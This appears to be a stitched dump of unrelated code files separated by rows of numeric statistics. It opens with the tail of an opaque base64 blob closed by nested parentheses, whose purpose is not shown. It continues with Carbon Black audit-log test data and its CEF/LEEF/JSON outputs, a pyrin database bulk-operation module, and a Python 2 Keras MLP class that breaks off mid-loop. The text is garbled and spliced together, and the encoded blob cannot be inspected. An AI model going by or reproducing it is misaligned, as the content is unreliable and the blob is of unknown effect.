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')))
| 288.483871 | 8,030 | 0.927988 | 252 | 8,943 | 32.678571 | 0.90873 | 0.003279 | 0.004614 | 0.006315 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134752 | 0.022476 | 8,943 | 30 | 8,031 | 298.1 | 0.807252 | 0.004696 | 0 | 0 | 0 | 0.142857 | 0.966891 | 0.964845 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.571429 | 0 | 0.571429 | 0.142857 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 9 |
8c546ba92959ff75b0334865dd009a2dcde5e45f | 6,770 | py | Python | src/test/test_data_audit.py | opploans/cbc-syslog | 72a203b1dbe6ddd97f02dc87f36631d758564022 | [
"MIT"
] | 14 | 2020-04-28T12:52:50.000Z | 2021-08-25T00:36:51.000Z | src/test/test_data_audit.py | opploans/cbc-syslog | 72a203b1dbe6ddd97f02dc87f36631d758564022 | [
"MIT"
] | 21 | 2016-10-24T20:16:39.000Z | 2020-02-11T21:30:50.000Z | src/test/test_data_audit.py | opploans/cbc-syslog | 72a203b1dbe6ddd97f02dc87f36631d758564022 | [
"MIT"
] | 15 | 2016-12-19T20:39:24.000Z | 2020-01-02T16:26:34.000Z | # -*- coding: utf-8 -*-
# JSON-style shims so the raw notification payload below can be pasted
# verbatim as a Python literal
null = ""
true = "true"
false = "false"
test_data_audit = {
"notifications": [
{
"requestUrl": null,
"eventTime": 1529332687006,
"eventId": "37075c01730511e89504c9ba022c3fbf",
"loginName": "bs@carbonblack.com",
"orgName": "example.org",
"flagged": false,
"clientIp": "192.0.2.3",
"verbose": false,
"description": "Logged in successfully"
},
{
"requestUrl": null,
"eventTime": 1529332689528,
"eventId": "38882fa2730511e89504c9ba022c3fbf",
"loginName": "bs@carbonblack.com",
"orgName": "example.org",
"flagged": false,
"clientIp": "192.0.2.3",
"verbose": false,
"description": "Logged in successfully"
},
{
"requestUrl": null,
"eventTime": 1529345346615,
"eventId": "b0be64fd732211e89504c9ba022c3fbf",
"loginName": "bs@carbonblack.com",
"orgName": "example.org",
"flagged": false,
"clientIp": "192.0.2.1",
"verbose": false,
"description": "Updated connector jason-splunk-test with api key Y8JNJZFBDRUJ2ZSM"
},
{
"requestUrl": null,
"eventTime": 1529345352229,
"eventId": "b41705e7732211e8bd7e5fdbf9c916a3",
"loginName": "bs@carbonblack.com",
"orgName": "example.org",
"flagged": false,
"clientIp": "192.0.2.2",
"verbose": false,
"description": "Updated connector Training with api key GRJSDHRR8YVRML3Q"
},
{
"requestUrl": null,
"eventTime": 1529345371514,
"eventId": "bf95ae38732211e8bd7e5fdbf9c916a3",
"loginName": "bs@carbonblack.com",
"orgName": "example.org",
"flagged": false,
"clientIp": "192.0.2.2",
"verbose": false,
"description": "Logged in successfully"
}
],
"success": true,
"message": "Success"
}
cef_output_audit = ['test CEF:0|CarbonBlack|CbDefense_Syslog_Connector|2.0|Audit Logs|Logged in successfully|1|rt="Jun 18 2018 14:38:07" dvchost=example.org duser=bs@carbonblack.com dvc=192.0.2.3 cs3Label="Link" cs3="" cs4Label="Threat_ID" cs4="37075c01730511e89504c9ba022c3fbf" deviceprocessname=PSC act=Alert', 'test CEF:0|CarbonBlack|CbDefense_Syslog_Connector|2.0|Audit Logs|Logged in successfully|1|rt="Jun 18 2018 14:38:09" dvchost=example.org duser=bs@carbonblack.com dvc=192.0.2.3 cs3Label="Link" cs3="" cs4Label="Threat_ID" cs4="38882fa2730511e89504c9ba022c3fbf" deviceprocessname=PSC act=Alert', 'test CEF:0|CarbonBlack|CbDefense_Syslog_Connector|2.0|Audit Logs|Updated connector jason-splunk-test with api key Y8JNJZFBDRUJ2ZSM|1|rt="Jun 18 2018 18:09:06" dvchost=example.org duser=bs@carbonblack.com dvc=192.0.2.1 cs3Label="Link" cs3="" cs4Label="Threat_ID" cs4="b0be64fd732211e89504c9ba022c3fbf" deviceprocessname=PSC act=Alert', 'test CEF:0|CarbonBlack|CbDefense_Syslog_Connector|2.0|Audit Logs|Updated connector Training with api key GRJSDHRR8YVRML3Q|1|rt="Jun 18 2018 18:09:12" dvchost=example.org duser=bs@carbonblack.com dvc=192.0.2.2 cs3Label="Link" cs3="" cs4Label="Threat_ID" cs4="b41705e7732211e8bd7e5fdbf9c916a3" deviceprocessname=PSC act=Alert', 'test CEF:0|CarbonBlack|CbDefense_Syslog_Connector|2.0|Audit Logs|Logged in successfully|1|rt="Jun 18 2018 18:09:31" dvchost=example.org duser=bs@carbonblack.com dvc=192.0.2.2 cs3Label="Link" cs3="" cs4Label="Threat_ID" cs4="bf95ae38732211e8bd7e5fdbf9c916a3" deviceprocessname=PSC act=Alert']
leef_output_audit = ['LEEF:2.0|CarbonBlack|CbDefense|0.1|AUDIT|x09|cat=AUDIT\tdevTime=Jun-18-2018 14:38:07 GMT\tdevTimeFormat=MMM dd yyyy HH:mm:ss z\teventId=37075c01730511e89504c9ba022c3fbf\tloginName=bs@carbonblack.com\torgName=example.org\tsrc=192.0.2.3\tsummary=Logged in successfully', 'LEEF:2.0|CarbonBlack|CbDefense|0.1|AUDIT|x09|cat=AUDIT\tdevTime=Jun-18-2018 14:38:09 GMT\tdevTimeFormat=MMM dd yyyy HH:mm:ss z\teventId=38882fa2730511e89504c9ba022c3fbf\tloginName=bs@carbonblack.com\torgName=example.org\tsrc=192.0.2.3\tsummary=Logged in successfully', 'LEEF:2.0|CarbonBlack|CbDefense|0.1|AUDIT|x09|cat=AUDIT\tdevTime=Jun-18-2018 18:09:06 GMT\tdevTimeFormat=MMM dd yyyy HH:mm:ss z\teventId=b0be64fd732211e89504c9ba022c3fbf\tloginName=bs@carbonblack.com\torgName=example.org\tsrc=192.0.2.1\tsummary=Updated connector jason-splunk-test with api key Y8JNJZFBDRUJ2ZSM', 'LEEF:2.0|CarbonBlack|CbDefense|0.1|AUDIT|x09|cat=AUDIT\tdevTime=Jun-18-2018 18:09:12 GMT\tdevTimeFormat=MMM dd yyyy HH:mm:ss z\teventId=b41705e7732211e8bd7e5fdbf9c916a3\tloginName=bs@carbonblack.com\torgName=example.org\tsrc=192.0.2.2\tsummary=Updated connector Training with api key GRJSDHRR8YVRML3Q', 'LEEF:2.0|CarbonBlack|CbDefense|0.1|AUDIT|x09|cat=AUDIT\tdevTime=Jun-18-2018 18:09:31 GMT\tdevTimeFormat=MMM dd yyyy HH:mm:ss z\teventId=bf95ae38732211e8bd7e5fdbf9c916a3\tloginName=bs@carbonblack.com\torgName=example.org\tsrc=192.0.2.2\tsummary=Logged in successfully']
json_output_audit = [{'requestUrl': '', 'eventTime': 1529332687006, 'eventId': '37075c01730511e89504c9ba022c3fbf', 'loginName': 'bs@carbonblack.com', 'orgName': 'example.org', 'flagged': 'false', 'clientIp': '192.0.2.3', 'verbose': 'false', 'description': 'Logged in successfully', 'type': 'AUDIT', 'source': 'test'}, {'requestUrl': '', 'eventTime': 1529332689528, 'eventId': '38882fa2730511e89504c9ba022c3fbf', 'loginName': 'bs@carbonblack.com', 'orgName': 'example.org', 'flagged': 'false', 'clientIp': '192.0.2.3', 'verbose': 'false', 'description': 'Logged in successfully', 'type': 'AUDIT', 'source': 'test'}, {'requestUrl': '', 'eventTime': 1529345346615, 'eventId': 'b0be64fd732211e89504c9ba022c3fbf', 'loginName': 'bs@carbonblack.com', 'orgName': 'example.org', 'flagged': 'false', 'clientIp': '192.0.2.1', 'verbose': 'false', 'description': 'Updated connector jason-splunk-test with api key Y8JNJZFBDRUJ2ZSM', 'type': 'AUDIT', 'source': 'test'}, {'requestUrl': '', 'eventTime': 1529345352229, 'eventId': 'b41705e7732211e8bd7e5fdbf9c916a3', 'loginName': 'bs@carbonblack.com', 'orgName': 'example.org', 'flagged': 'false', 'clientIp': '192.0.2.2', 'verbose': 'false', 'description': 'Updated connector Training with api key GRJSDHRR8YVRML3Q', 'type': 'AUDIT', 'source': 'test'}, {'requestUrl': '', 'eventTime': 1529345371514, 'eventId': 'bf95ae38732211e8bd7e5fdbf9c916a3', 'loginName': 'bs@carbonblack.com', 'orgName': 'example.org', 'flagged': 'false', 'clientIp': '192.0.2.2', 'verbose': 'false', 'description': 'Logged in successfully', 'type': 'AUDIT', 'source': 'test'}]
| 86.794872 | 1,582 | 0.683604 | 795 | 6,770 | 5.792453 | 0.132075 | 0.05646 | 0.06949 | 0.054289 | 0.879045 | 0.879045 | 0.862106 | 0.828665 | 0.828665 | 0.807383 | 0 | 0.151701 | 0.157755 | 6,770 | 77 | 1,583 | 87.922078 | 0.65591 | 0.003102 | 0 | 0.477612 | 0 | 0.149254 | 0.732325 | 0.331258 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4fc438162b29a38e5fd29f6e2dc58fbd62afae5c | 18,245 | py | Python | src/pyrin/database/bulk/services.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | src/pyrin/database/bulk/services.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | src/pyrin/database/bulk/services.py | wilsonGmn/pyrin | 25dbe3ce17e80a43eee7cfc7140b4c268a6948e0 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
database bulk services module.
"""
from pyrin.application.services import get_component
from pyrin.database.bulk import DatabaseBulkPackage
def insert(*entities, **options):
"""
bulk inserts the given entities.
    note that all entities must be of the same type.
:param BaseEntity entities: entities to be inserted.
:keyword int chunk_size: chunk size to insert values.
after each chunk, store will be committed.
if not provided, all values will be inserted
in a single call and no commit will occur.
:keyword SECURE_TRUE | SECURE_FALSE readable: specifies that any column or attribute
which has `allow_read=False` or its name
starts with underscore `_`, should not
be included in result dict. defaults to
`SECURE_TRUE` if not provided.
:keyword dict[str, list[str]] | list[str] columns: column names to be included in result.
it could be a list of column names.
for example:
`columns=['id', 'name', 'age']`
but if you want to include
relationships, then columns for each
entity must be provided in a key for
that entity class name.
for example if there is `CarEntity` and
`PersonEntity`, it should be like this:
`columns=dict(CarEntity=
['id', 'name'],
PersonEntity=
['id', 'age'])`
if provided column names are not
available in result, they will
be ignored.
:note columns: dict[str entity_class_name, list[str column_name]] | list[str column_name]
:keyword dict[str, dict[str, str]] | dict[str, str] rename: column names that must be
renamed in the result.
it could be a dict with keys
as original column names and
values as new column names
that should be exposed instead
of original column names.
for example:
`rename=dict(age='new_age',
name='new_name')`
but if you want to include
relationships, then you must
provide a dict containing
entity class name as key and
for value, another dict
containing original column
names as keys, and column
names that must be exposed
instead of original names,
as values. for example
if there is `CarEntity` and `
PersonEntity`, it should be
like this:
`rename=
dict(CarEntity=
dict(name='new_name'),
PersonEntity=
dict(age='new_age')`
then, the value of `name`
column in result will be
returned as `new_name` column.
and also value of `age` column
in result will be returned as
'new_age' column. if provided
rename columns are not
available in result, they
will be ignored.
:note rename: dict[str entity_class_name, dict[str original_column, str new_column]] |
dict[str original_column, str new_column]
:keyword dict[str, list[str]] | list[str] exclude: column names to be excluded from
result. it could be a list of column
names. for example:
`exclude=['id', 'name', 'age']`
but if you want to include
relationships, then columns for each
entity must be provided in a key for
that entity class name.
for example if there is `CarEntity`
and `PersonEntity`, it should be
like this:
`exclude=dict(CarEntity=
['id', 'name'],
PersonEntity=
['id', 'age'])`
if provided excluded columns are not
available in result, they will be
ignored.
:note exclude: dict[str entity_class_name, list[str column_name]] | list[str column_name]
:keyword int depth: a value indicating the depth for conversion.
for example if entity A has a relationship with
entity B and there is a list of B in A, if `depth=0`
is provided, then just columns of A will be available
in result dict, but if `depth=1` is provided, then all
B entities in A will also be included in the result dict.
actually, `depth` specifies that relationships in an
entity should be followed by how much depth.
note that, if `columns` is also provided, it is required to
specify relationship property names in provided columns.
otherwise they won't be included even if `depth` is provided.
defaults to `default_depth` value of database config store.
                        please be careful when increasing `depth`, as higher
                        values could make the application fail. choose it wisely.
normally the maximum acceptable `depth` would be 2 or 3.
there is a hard limit for max valid `depth` which is set
in `ConverterMixin.MAX_DEPTH` class variable. providing higher
`depth` value than this limit, will cause an error.
"""
return get_component(DatabaseBulkPackage.COMPONENT_NAME).insert(*entities, **options)
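# A minimal usage sketch, not part of the original module: it assumes a
# hypothetical `CarEntity` model class and shows how the keyword options
# documented above combine. All names in it are illustrative only.
#
#     insert(CarEntity(id=1, name='a'), CarEntity(id=2, name='b'),
#            chunk_size=1000,
#            columns=['id', 'name'],
#            rename=dict(name='new_name'),
#            depth=0)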
def update(*entities, **options):
"""
bulk updates the given entities.
    note that all entities must be of the same type.
:param BaseEntity entities: entities to be updated.
:keyword int chunk_size: chunk size to update values.
after each chunk, store will be committed.
if not provided, all values will be updated
in a single call and no commit will occur.
:keyword SECURE_TRUE | SECURE_FALSE readable: specifies that any column or attribute
which has `allow_read=False` or its name
starts with underscore `_`, should not
be included in result dict. defaults to
`SECURE_TRUE` if not provided.
:keyword dict[str, list[str]] | list[str] columns: column names to be included in result.
it could be a list of column names.
for example:
`columns=['id', 'name', 'age']`
but if you want to include
relationships, then columns for each
entity must be provided in a key for
that entity class name.
for example if there is `CarEntity` and
`PersonEntity`, it should be like this:
`columns=dict(CarEntity=
['id', 'name'],
PersonEntity=
['id', 'age'])`
if provided column names are not
available in result, they will
be ignored.
:note columns: dict[str entity_class_name, list[str column_name]] | list[str column_name]
:keyword dict[str, dict[str, str]] | dict[str, str] rename: column names that must be
renamed in the result.
it could be a dict with keys
as original column names and
values as new column names
that should be exposed instead
of original column names.
for example:
`rename=dict(age='new_age',
name='new_name')`
but if you want to include
relationships, then you must
provide a dict containing
entity class name as key and
for value, another dict
containing original column
names as keys, and column
names that must be exposed
instead of original names,
as values. for example
if there is `CarEntity` and `
PersonEntity`, it should be
like this:
`rename=
dict(CarEntity=
dict(name='new_name'),
PersonEntity=
dict(age='new_age')`
then, the value of `name`
column in result will be
returned as `new_name` column.
and also value of `age` column
in result will be returned as
'new_age' column. if provided
rename columns are not
available in result, they
will be ignored.
:note rename: dict[str entity_class_name, dict[str original_column, str new_column]] |
dict[str original_column, str new_column]
:keyword dict[str, list[str]] | list[str] exclude: column names to be excluded from
result. it could be a list of column
names. for example:
`exclude=['id', 'name', 'age']`
but if you want to include
relationships, then columns for each
entity must be provided in a key for
that entity class name.
for example if there is `CarEntity`
and `PersonEntity`, it should be
like this:
`exclude=dict(CarEntity=
['id', 'name'],
PersonEntity=
['id', 'age'])`
if provided excluded columns are not
available in result, they will be
ignored.
:note exclude: dict[str entity_class_name, list[str column_name]] | list[str column_name]
:keyword int depth: a value indicating the depth for conversion.
for example if entity A has a relationship with
entity B and there is a list of B in A, if `depth=0`
is provided, then just columns of A will be available
in result dict, but if `depth=1` is provided, then all
B entities in A will also be included in the result dict.
actually, `depth` specifies that relationships in an
entity should be followed by how much depth.
note that, if `columns` is also provided, it is required to
specify relationship property names in provided columns.
otherwise they won't be included even if `depth` is provided.
defaults to `default_depth` value of database config store.
                        please be careful when increasing `depth`, as higher
                        values could make the application fail. choose it wisely.
normally the maximum acceptable `depth` would be 2 or 3.
there is a hard limit for max valid `depth` which is set
in `ConverterMixin.MAX_DEPTH` class variable. providing higher
`depth` value than this limit, will cause an error.
"""
return get_component(DatabaseBulkPackage.COMPONENT_NAME).update(*entities, **options)
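# A matching sketch for bulk updates (illustrative only; `person_entities` is
# an assumed list of already-loaded PersonEntity instances): commit after
# every 500 rows and drop the `age` column from the returned dicts.
#
#     update(*person_entities,
#            chunk_size=500,
#            exclude=['age'],
#            depth=0)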
| 71.269531 | 94 | 0.346561 | 1,358 | 18,245 | 4.611193 | 0.12813 | 0.038646 | 0.028745 | 0.021718 | 0.954966 | 0.954966 | 0.954966 | 0.945385 | 0.945385 | 0.945385 | 0 | 0.001292 | 0.618142 | 18,245 | 255 | 95 | 71.54902 | 0.897517 | 0.931488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 12 |
8b0411fd5b75877e7e496a041947b69a1667ee4a | 65,860 | py | Python | models.py | maragraziani/intentionally_flawed_models | 181d616d76dd04cfe47186c5bed5c4d82bd655d4 | [
"MIT"
] | 2 | 2020-07-28T09:54:12.000Z | 2021-11-02T03:58:24.000Z | models.py | maragraziani/intentionally_flawed_models | 181d616d76dd04cfe47186c5bed5c4d82bd655d4 | [
"MIT"
] | null | null | null | models.py | maragraziani/intentionally_flawed_models | 181d616d76dd04cfe47186c5bed5c4d82bd655d4 | [
"MIT"
] | null | null | null | import keras
import numpy as np
import keras.datasets
import matplotlib.pyplot as plt
import os
import image
reload(image)
from image import *
import skimage.measure
import keras.backend as K
'''
Models contains all the classes used to implement the three types of
architectures used for the experiments:
- MLP with 2 to 6 FC layers of 4096 units
- CNN with 2 Conv layers, bn, relu, max pooling blocks
- InceptionV3
'''
class MLP():
'''
Multilayer Perceptron for experiments on MNIST
Params
deep: int
Default 2
wide: int
Default 512
optimizer: string
Default SGD
lr: float
Default 1e-2
epochs: int
Default 10
batch_size: int
Default: 32
input_shape: int
Default 28
n_classes: int
Default 10
'''
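    # A minimal construction sketch (illustrative, not from the original
    # source; `mnist` stands for any object exposing x_train/y_train as
    # train() expects):
    #
    #     net = MLP(deep=3, wide=4096, epochs=10)
    #     net.train(mnist)
    #     net.save('mlp_3x4096', 'checkpoints')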
def __init__(self, deep=2, wide=512, optimizer='SGD', lr=1e-2, epochs=10,
batch_size=32, input_shape=28, n_classes=10, **kwargs):
#mask_shape = np.ones((1,512))
#mask = keras.backend.variable(mask_shape)
mlp = keras.models.Sequential()
mlp.add(keras.layers.Flatten(input_shape=(input_shape,input_shape)))
counter = 0
while counter<deep:
            mlp.add(keras.layers.Dense(wide, activation='relu'))
counter+=1
loss_function = 'categorical_crossentropy'
activation = 'softmax'
if n_classes == 2:
loss_function = 'binary_crossentropy'
activation = 'sigmoid'
        mlp.add(keras.layers.Dense(n_classes, activation=activation))
#masking_layer = keras.layers.Lambda(lambda x: x*mask)(bmlp.layers[-2].output)
#if n_hidden_layers>1:
# while n_hidden_layers!=1:
# masking_layer= keras.layers.Dense(512, activation=keras.layers.Activation('sigmoid'))(masking_layer)
# n_hidden_layers-=1
#decision_layer = keras.layers.Dense(10, activation=keras.layers.Activation('softmax'))(masking_layer)
#masked_model = keras.models.Model(input= bmlp.input, output=decision_layer)
model = keras.models.Model(input=mlp.input, output=mlp.output)
model.compile(optimizer=optimizer,
loss=loss_function,
metrics=['accuracy'])
self.model = model
self.epochs = epochs
self.batch_size = batch_size
def train_and_compute_rcvs(self, dataset, lcp_gnf='0.8lcp_'):
'''
Train and Compute RCVs
        Saves the layer embeddings at each epoch to an .npy file.
        dataset: object of class MNISTRandom, ImageNet10Random or Cifar10Random
            provides the training data (dataset.x_train, dataset.y_train)
        lcp_gnf: string
            says whether the dataset is corrupted with label corruption (lcp)
            or gaussian noise in the inputs (gnf). Specify the respective lcp
            (x.xlcp_) or gnf (x.xgnf_) value as the filename prefix, e.g.
            0.8lcp_ for label corruption with probability 0.8
            or 0.5gnf_ for a gaussian noise fraction of 0.5
'''
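        # Example call (hedged sketch): for MNIST with 80% label corruption,
        #     model.train_and_compute_rcvs(dataset, lcp_gnf='0.8lcp_')
        # writes one '0.8lcp_training_emb_e<epoch>.npy' file per epoch.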
x_train = dataset.x_train
y_train = dataset.y_train
        # one-hot encode the labels unless they already come as a 2-D array
        if np.ndim(y_train) != 2:
            y_train = keras.utils.to_categorical(y_train)
history=[]
embeddings=[]
batch_size=self.batch_size
        # specify which layer outputs to save; this part changes from network to network
layers_of_interest = [layer.name for layer in self.model.layers[2:-1]]
self.model.metrics_tensors += [layer.output for layer in self.model.layers if layer.name in layers_of_interest]
epoch_number = 0
        # train batch by batch, appending the requested layer outputs
n_batches = len(x_train)/self.batch_size
remaining = len(x_train)-n_batches * self.batch_size
while epoch_number <= self.epochs:
print epoch_number
batch_number = 0
embedding_=[]
for l in layers_of_interest:
space = np.zeros((len(x_train), self.model.get_layer(l).output.shape[-1]))
embedding_.append(space)
while batch_number <= n_batches:
outs=self.model.train_on_batch(
x_train[batch_number*batch_size:batch_number*batch_size + batch_size],
y_train[batch_number*batch_size:batch_number*batch_size + batch_size])
